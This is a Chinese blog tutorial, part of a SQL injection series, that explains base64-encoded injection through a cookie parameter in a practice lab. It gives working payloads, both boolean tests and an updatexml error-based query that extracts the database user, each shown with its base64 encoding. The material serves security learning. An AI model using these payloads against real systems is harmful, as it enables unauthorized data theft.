web安全之SQL注入(八)

最新推荐文章于 2024-07-20 15:57:52 发布
最新推荐文章于 2024-07-20 15:57:52 发布
阅读量847 收藏 3
点赞数
分类专栏: WEB安全 文章标签: web安全 渗透测试 SQL注入 MYSQL
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/123054228
版权

文中详细讲解web安全之SQL注入,通过文中内容更加深入的掌握SQL注入的原理及检测方法,从而更好的用于渗透测试中;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

web安全之SQL注入(八)

base64注入

原理

base64编码主要用于数据编码传输,同样接收的参数也有可能使用传输,当接收的值使用base64传输时,即便开启了gpc注入拦截,因为编码过后的字符串不存在特殊字符,从而绕过gpc的检测,再加上在程序中得到重新的解码,这样就会造成base64注入。
编码解码过程

1 ->base64 编码->MQ==->base64 解密->1

在这里插入图片描述

代码分析

从图中就可以看在cookie处,可以使用base64编码后进行注入。
这里造成注入点的位置,就是因为在代码中使用base64解码,从而让我们的攻击者在传入值的时候,使用base64加密,从而带入数据库中查询。
在这里插入图片描述

漏洞演示

首先我们来判断是否存在注入,将判断语句进行base64编码

admin') and 1=1#

编码后:YWRtaW4nKSBhbmQgMT0xIw==
在这里插入图片描述

admin') and 1=2#

编码后:YWRtaW4nKSBhbmQgMT0yIw==
在这里插入图片描述
通过两次返回的页面不同,来判断注入存在。
通过之前的代码分析,可以看出能使用报错注入,这里将报错注入的攻击语句进行base64编码后,进行敏感数据获取。

admin')and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#

编码后:YWRtaW4nKWFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB1c2VyKCkpLDB4N2UpLDEpKSM=
在这里插入图片描述
需要获取其他的敏感信息,只需要修改字查询的位置即可。

全局变量Global
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
Web渗透测试SQL注入:Level8--布尔盲注
vodkaDL的博客
11-16 248
文章目录前言题目分析盲注布尔盲注布尔盲注常用函数总结 前言 题目分析 题目页面如下: 按照提示输入1,2,3等参数后页面基本一致: 输入单引号后虽然出错,但并没有将错误信息打印到页面: 输入 'and ‘1’='1 与 'and ‘1’='2 后二者页面不一致,由此可确定确实存在漏洞且闭合符应为单引号: 进行到这一步你感到非常憋屈,网站既没有把查询结果直接返回到页面,也没有把错误信息打印出来,这让你引以为傲地联合查询注入和报错注入都失去了用武之地。思来想去,这种情境下只能采用盲注了。但对于盲注,尤其
sql-labs注入1-10
jinhezhai的博客
01-13 1045
sql-labs1-20
web安全SQL注入(二)
Longwaer
02-15 430
了解SQL注入各种小技巧,通过学习掌握原理配合靶场练习,更加深入的对SQL注入进行全方位刨析。
SQL注入详解 7-10
君莫hacker的博客
09-25 642
目录Less-7(outfile 导入文件)Less-8(布尔盲注+时间盲注)Less-9(时间盲注)Less-10(时间盲注) Less-7(outfile 导入文件) 第七总结: 第七的标题为dump into outfile,这表明我们需要利用文件导入来进行注入,这里首先需要判断注入类型,然后导入的路径我们可以根据前几来确定,在真实环境我们可以利用报错来得到一些路径,也可以判断服务器的类型,根据网站的默认路径等来获得绝对路径 判断注入类型 1' 1')) and 1=1--+ 1'))
SQL注入实验——web靶机第(布尔型盲注)
qq_41554179的博客
03-15 1039
判断字符类型(无交互此为字符型) http://192.168.96.133/sqli-labs-master/Less-8/?id=1%20and%201=2 判断闭合(此靶机报错不显示任何东西,闭合为‘) http://192.168.96.133/sqli-labs-master/Less-8/?id=1%27 通过length函数判断数据库名长度 192.168....
Web安全SQL注入
01-21
SQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点...
bwapp---sql注入过程及分析
weixin_45821250的博客
12-05 531
sqlmap和手注的两个方法 结果得出,总结下sqlmap需要的几个参数 -u 他后面跟url地址 –cookie 他后面跟登陆状态cookie –data 他后面跟你当时传递值 –dbs 查询数据库 –tables 查询数据表 –c.
SQL注入——基于布尔的盲注(
Gjqhs的博客
02-19 1880
本章目的 普及布尔盲注技术的运用场景及条件,熟悉length()、substr()、ascii()等函数的 用法,掌握基于布尔的盲注基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件: sqlmap 、 Burpsuite、 FireFox浏览器及其插件Hackbar、 等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 想机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软
web安全SQL注入(一)
Longwaer
02-14 1157
学习了解掌握web安全SQL注入的原理及检测方法,更好的用于渗透测试中完成检测。
SQL注入之布尔盲注——sql-lab第
_Co1a
12-21 1495
布尔盲注简介 什么是盲注 盲注其实是sql注入的一种,之所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。 【之前在做联合注入第一的时候,用union select语句注入,想要查询的信息是回显在Your password和 Your Login name后面,如下图。但是盲注不会回显让你直白的看出信息的(但是可能会有一些间接的回显信息),所以只能通过另外一种方式去获取我们的信息】 盲注分为两类: 1、布尔盲注——》 布尔很明显Ture跟Fales,也就是说它只会根据你的注入信
【网络安全科普】勒索病毒 防护指南
最新发布
a38417的博客
07-20 671
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
web安全之跨站脚本攻击xss
奔跑的小猪仔
07-17 961
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 1165
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全防御 -- 双机热备和带宽管理综合实验
rrl18215821889的博客
07-16 588
12,对现有网络进行改造升级,将当个防火墙组网改成双机热备的组网形式,做负载分担模式,游客区和DMZ区走FW3,生产区和办公区的流量走FW1。13,办公区上网用户限制流量不超过100M,其中销售部人员在其基础上限制流量不超过60M,且销售部一共10人,每人限制流量不超过6M。16,外网访问内网服务器,下行流量不超过40M,DMZ中的每台服务器限制对外提供的最大下行带宽不超过20M。做负载分担模式,生产区和办公区的流量走FW1,游客区和DMZ区走FW3。配置g0/0/0ip和开启服务。办公区销售部带宽策略;
网络安全----web安全防范
weixin_55357256的博客
07-16 660
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
网络安全-网络安全及其防护措施6
LS_Ai的博客
07-16 948
访问控制列表(ACL)是一种网络安全机制,用于控制网络设备上的数据包流量。通过ACL,可以定义允许或拒绝的流量,增强网络的安全性和管理效率。ACL通过在路由器或交换机上设置规则,确定哪些流量可以通过,哪些流量应该被阻止。入侵检测系统(IDS)定义:监控网络流量和系统活动,检测和记录潜在的安全威胁和攻击行为。IDS提供告警信息,但不主动阻止攻击。作用:检测并报警,但不干预攻击,主要用于识别潜在的安全问题和攻击模式。入侵防御系统(IPS)定义:在IDS的基础上,进一步采取措施阻止攻击行为,保护网络安全
【网络安全】PostMessage:分析JS实现XSS
等风来
07-17 808
PostMessage是一个用于在网页间安全地发送消息的浏览器 API。它允许不同的窗口(例如,来自同一域名下的不同页面或者不同域名下的跨域页面)进行通信,而无需通过服务器。通常情况下,它用于实现跨文档消息传递(Cross-Document Messaging),这在一些复杂的网页应用和浏览器插件中非常有用。
云计算监控减少网络安全事件的五种方法
QQ3007250950的博客
07-17 1078
没有充分保护自己的公司很容易受到网络攻击。如果他们使用云计算平台进行操作,这种风险就会增加。如果他们采取适当的安全措施来保护自己,那将是最好的。这些措施的一部分是实施云计算监控,这是一个允许网络安全专业人员主动检测云系统中的漏洞和可疑活动的过程。
揭秘WEB安全SQL注入漏洞全解析与防护策略
SQL注入Web安全领域的重要概念,它是指黑客利用应用程序中对用户输入的敏感信息处理不当,构造特殊请求,使得Web应用在执行数据库查询时插入恶意SQL语句,从而获取、修改或控制数据库信息的一种攻击方式。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值